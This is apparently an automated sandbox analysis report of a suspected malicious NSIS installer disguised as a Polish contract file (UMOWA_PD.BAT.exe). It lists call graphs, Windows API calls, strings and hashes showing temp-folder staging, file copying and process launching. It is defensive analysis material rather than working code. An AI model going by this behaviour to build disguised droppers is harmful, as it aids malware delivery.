40202f 6015 402dab 21 API calls 6014->6015 6016 402036 6015->6016 6017 406915 5 API calls 6016->6017 6018 402045 6017->6018 6019 402061 GlobalAlloc 6018->6019 6020 4020d1 6018->6020 6019->6020 6021 402075 6019->6021 6022 406915 5 API calls 6021->6022 6023 40207c 6022->6023 6024 406915 5 API calls 6023->6024 6025 402086 6024->6025 6025->6020 6029 406468 wsprintfW 6025->6029 6027 4020bf 6030 406468 wsprintfW 6027->6030 6029->6027 6030->6020 6031 6fe2170d 6032 6fe215b6 GlobalFree 6031->6032 6034 6fe21725 6032->6034 6033 6fe2176b GlobalFree 6034->6033 6035 6fe21740 6034->6035 6036 6fe21757 VirtualFree 6034->6036 6035->6033 6036->6033 6037 4021af 6038 402dab 21 API calls 6037->6038 6039 4021b6 6038->6039 6040 402dab 21 API calls 6039->6040 6041 4021c0 6040->6041 6042 402dab 21 API calls 6041->6042 6043 4021ca 6042->6043 6044 402dab 21 API calls 6043->6044 6045 4021d4 6044->6045 6046 402dab 21 API calls 6045->6046 6047 4021de 6046->6047 6048 40221d CoCreateInstance 6047->6048 6049 402dab 21 API calls 6047->6049 6052 40223c 6048->6052 6049->6048 6050 401423 28 API calls 6051 4022fb 6050->6051 6052->6050 6052->6051 6053 403bb1 6054 403bbc 6053->6054 6055 403bc3 GlobalAlloc 6054->6055 6056 403bc0 6054->6056 6055->6056 6057 407332 6060 406ac3 6057->6060 6058 406b44 GlobalFree 6059 406b4d GlobalAlloc 6058->6059 6059->6060 6061 40742e 6059->6061 6060->6058 6060->6059 6060->6060 6060->6061 6062 406bc4 GlobalAlloc 6060->6062 6063 406bbb GlobalFree 6060->6063 6062->6060 6062->6061 6063->6062 6064 401a35 6065 402dab 21 API calls 6064->6065 6066 401a3e ExpandEnvironmentStringsW 6065->6066 6067 401a52 6066->6067 6069 401a65 6066->6069 6068 401a57 lstrcmpW 6067->6068 6067->6069 6068->6069 6075 4023b7 6076 4023c5 6075->6076 6077 4023bf 6075->6077 6079 402dab 21 API calls 6076->6079 6081 4023d3 6076->6081 6078 402dab 21 API calls 6077->6078 6078->6076 6079->6081 6080 4023e1 6083 402dab 21 API calls 6080->6083 6081->6080 6082 402dab 21 API calls 6081->6082 6082->6080 6084 4023ea WritePrivateProfileStringW 6083->6084 6085 4014b8 6086 4014be 6085->6086 6087 401389 2 API calls 6086->6087 6088 4014c6 6087->6088 4826 402439 4827 402441 4826->4827 4828 40246c 4826->4828 4830 402deb 21 API calls 4827->4830 4829 402dab 21 API calls 4828->4829 4831 402473 4829->4831 4832 402448 4830->4832 4838 402e69 4831->4838 4834 402452 4832->4834 4836 402480 4832->4836 4835 402dab 21 API calls 4834->4835 4837 402459 RegDeleteValueW RegCloseKey 4835->4837 4837->4836 4839 402e76 4838->4839 4840 402e7d 4838->4840 4839->4836 4840->4839 4842 402eae 4840->4842 4843 40638e RegOpenKeyExW 4842->4843 4844 402edc 4843->4844 4845 402f91 4844->4845 4846 402ee6 4844->4846 4845->4839 4847 402eec RegEnumValueW 4846->4847 4851 402f0f 4846->4851 4848 402f76 RegCloseKey 4847->4848 4847->4851 4848->4845 4849 402f4b RegEnumKeyW 4850 402f54 RegCloseKey 4849->4850 4849->4851 4852 406915 5 API calls 4850->4852 4851->4848 4851->4849 4851->4850 4853 402eae 6 API calls 4851->4853 4854 402f64 4852->4854 4853->4851 4855 402f86 4854->4855 4856 402f68 RegDeleteKeyW 4854->4856 4855->4845 4856->4845 4857 40173a 4858 402dab 21 API calls 4857->4858 4859 401741 SearchPathW 4858->4859 4860 40175c 4859->4860 6089 401d3d 6090 402d89 21 API calls 6089->6090 6091 401d44 6090->6091 6092 402d89 21 API calls 6091->6092 6093 401d50 GetDlgItem 6092->6093 6094 40263d 6093->6094 6095 406c3f 6099 406ac3 6095->6099 6096 40742e 6097 406b44 GlobalFree 6098 406b4d GlobalAlloc 6097->6098 6098->6096 6098->6099 6099->6096 6099->6097 6099->6098 6100 406bc4 GlobalAlloc 6099->6100 6101 406bbb GlobalFree 6099->6101 6100->6096 6100->6099 6101->6100

                                                                                    Executed Functions

                                                                                    Function 004034FC Relevance: 79.2, APIs: 32, Strings: 13, Instructions: 464stringfilecomCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 12 4035e3 5->12 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 12->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 44 403840-40385a DeleteFileW call 403082 37->44 45 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->45 38->39 42 4036e0-4036e6 39->42 43 40379b-4037aa call 405e1d 39->43 47 403700-403739 42->47 48 4036e8-4036ef 42->48 43->32 61 4037ac-4037ad 43->61 66 403860-403866 44->66 67 403a47-403a57 call 403b19 OleUninitialize 44->67 45->44 64 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 45->64 54 403756-403790 47->54 55 40373b-403740 47->55 52 4036f1-4036f4 48->52 53 4036f6 48->53 52->47 52->53 53->47 58 403792-403796 54->58 59 403798-40379a 54->59 55->54 56 403742-40374a 55->56 62 403751 56->62 63 40374c-40374f 56->63 58->59 65 4037bc-4037c9 call 406521 58->65 59->43 61->32 62->54 63->54 63->62 64->44 64->67 65->37 70 40386c-403877 call 405e1d 66->70 71 4038ff-403906 call 403bf3 66->71 77 403a59-403a69 call 405b81 ExitProcess 67->77 78 403a7d-403a83 67->78 82 4038c5-4038cf 70->82 83 403879-4038ae 70->83 80 40390b-40390f 71->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->67 88 4038d1-4038df call 405ef8 82->88 89 403914-40393a call 405aec lstrlenW call 406521 82->89 93 4038b0-4038b4 83->93 90 403b0b 84->90 91 403b0f-403b13 ExitProcess 84->91 86 403ad1-403adf call 406915 85->86 87 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->87 104 403ae1-403aeb 86->104 105 403aed-403af8 ExitWindowsEx 86->105 87->86 88->67 106 4038e5-4038fb call 406521 * 2 88->106 110 40394b-403963 89->110 111 40393c-403946 call 406521 89->111 90->91 95 4038b6-4038bb 93->95 96 4038bd-4038c1 93->96 95->96 100 4038c3 95->100 96->93 96->100 100->82 104->105 108 403afa-403afc call 40140b 104->108 105->84 105->108 106->71 108->84 116 403968-40396c 110->116 111->110 118 403971-40399b wsprintfW call 40655e 116->118 122 4039a4 call 405acf 118->122 123 40399d-4039a2 call 405a75 118->123 126 4039a9-4039ab 122->126 123->126 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 126->128 129 4039ad-4039b7 GetFileAttributesW 126->129 137 403a45 128->137 138 403a08-403a29 call 4062e1 call 40655e call 405b04 128->138 130 4039d8-4039e3 129->130 131 4039b9-4039c2 DeleteFileW 129->131 130->116 134 4039e5 130->134 131->130 133 4039c4-4039d6 call 405c2d 131->133 133->118 133->130 134->67 137->67 146 403a2b-403a35 138->146 147 403a6f-403a7b CloseHandle 138->147 146->137 148 403a37-403a3f call 40687e 146->148 147->137 148->118 148->137
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                    • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                    • wsprintfW.USER32 ref: 0040397B
                                                                                    • GetFileAttributesW.KERNEL32(916,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                    • DeleteFileW.KERNEL32(916), ref: 004039BA
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                      • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\UMOWA_PD.BAT.exe,916,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                      • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,916,?), ref: 00405B2D
                                                                                      • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,916,?), ref: 00405B3A
                                                                                      • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                      • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                    • ExitProcess.KERNEL32 ref: 00403A69
                                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,916,00000000), ref: 00403A70
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                    • ExitProcess.KERNEL32 ref: 00403B13
                                                                                      • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                    • String ID: 1033$916$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\UMOWA_PD.BAT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                    • API String ID: 1813718867-965031739
                                                                                    • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                    • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                    • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                    • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
                                                                                    Function 004056E5 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 171 4057eb-4057ee 152->171 172 4057cf-4057e9 SendMessageW * 2 152->172 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 157 4058eb-4058f5 155->157 158 4058cf-4058d5 155->158 156->155 162 4058f7-4058fd 157->162 163 40594b-40594f 157->163 160 405910-405919 call 404507 158->160 161 4058d7-4058e6 ShowWindow * 2 call 4044d5 158->161 175 40591e-405922 160->175 161->157 167 405925-405935 ShowWindow 162->167 168 4058ff-40590b call 404479 162->168 163->160 165 405951-405957 163->165 165->160 173 405959-40596c SendMessageW 165->173 176 405945-405946 call 404479 167->176 177 405937-405940 call 4055a6 167->177 168->160 178 4057f0-4057fc SendMessageW 171->178 179 4057fe-405815 call 4044a0 171->179 172->171 180 405972-40599d CreatePopupMenu call 40655e AppendMenuW 173->180 181 405a6e-405a70 173->181 176->163 177->176 178->179 190 405817-40582b ShowWindow 179->190 191 40584b-40586c GetDlgItem SendMessageW 179->191 188 4059b2-4059c7 TrackPopupMenu 180->188 189 40599f-4059af GetWindowRect 180->189 181->175 188->181 192 4059cd-4059e4 188->192 189->188 193 40583a 190->193 194 40582d-405838 ShowWindow 190->194 191->181 195 405872-40588a SendMessageW * 2 191->195 196 4059e9-405a04 SendMessageW 192->196 197 405840-405846 call 4044d5 193->197 194->197 195->181 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                    • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                    • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                    • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                    • CreatePopupMenu.USER32 ref: 00405972
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                    • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                    • EmptyClipboard.USER32 ref: 00405A0D
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                    • CloseClipboard.USER32 ref: 00405A68
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                    • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                    • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                    • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58
                                                                                    Function 6FE21BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6FE212BB: GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FE21D2D
                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6FE21D75
                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6FE21D7F
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21D92
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E74
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E79
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE22068
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6FE22222
                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6FE222A1
                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6FE222B2
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6FE2230C
                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6FE22326
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 245916457-0
                                                                                    • Opcode ID: fecdfb39e3d275b5e76598cbeac32aa8fd25e03fb4647b0cddc97d165a16f091
                                                                                    • Instruction ID: 808f77ffff37e18f67b9e7f036b260245ee8eecec59937e8d2d8e7fe7bfe04d3
                                                                                    • Opcode Fuzzy Hash: fecdfb39e3d275b5e76598cbeac32aa8fd25e03fb4647b0cddc97d165a16f091
                                                                                    • Instruction Fuzzy Hash: 02225B71D5460ADAEB108FE889806EEBFF1FF05319F30462ED165E6280F7796682CB51
                                                                                    Function 00405C2D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 730 405c2d-405c53 call 405ef8 733 405c55-405c67 DeleteFileW 730->733 734 405c6c-405c73 730->734 735 405de9-405ded 733->735 736 405c75-405c77 734->736 737 405c86-405c96 call 406521 734->737 738 405d97-405d9c 736->738 739 405c7d-405c80 736->739 743 405ca5-405ca6 call 405e3c 737->743 744 405c98-405ca3 lstrcatW 737->744 738->735 742 405d9e-405da1 738->742 739->737 739->738 745 405da3-405da9 742->745 746 405dab-405db3 call 40687e 742->746 747 405cab-405caf 743->747 744->747 745->735 746->735 754 405db5-405dc9 call 405df0 call 405be5 746->754 750 405cb1-405cb9 747->750 751 405cbb-405cc1 lstrcatW 747->751 750->751 753 405cc6-405ce2 lstrlenW FindFirstFileW 750->753 751->753 756 405ce8-405cf0 753->756 757 405d8c-405d90 753->757 770 405de1-405de4 call 4055a6 754->770 771 405dcb-405dce 754->771 760 405d10-405d24 call 406521 756->760 761 405cf2-405cfa 756->761 757->738 759 405d92 757->759 759->738 772 405d26-405d2e 760->772 773 405d3b-405d46 call 405be5 760->773 762 405cfc-405d04 761->762 763 405d6f-405d7f FindNextFileW 761->763 762->760 766 405d06-405d0e 762->766 763->756 769 405d85-405d86 FindClose 763->769 766->760 766->763 769->757 770->735 771->745 774 405dd0-405ddf call 4055a6 call 4062e1 771->774 772->763 775 405d30-405d39 call 405c2d 772->775 783 405d67-405d6a call 4055a6 773->783 784 405d48-405d4b 773->784 774->735 775->763 783->763 787 405d4d-405d5d call 4055a6 call 4062e1 784->787 788 405d5f-405d65 784->788 787->763 788->763
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C56
                                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405C9E
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC1
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CC7
                                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405CD7
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-2576647971
                                                                                    • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                    • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
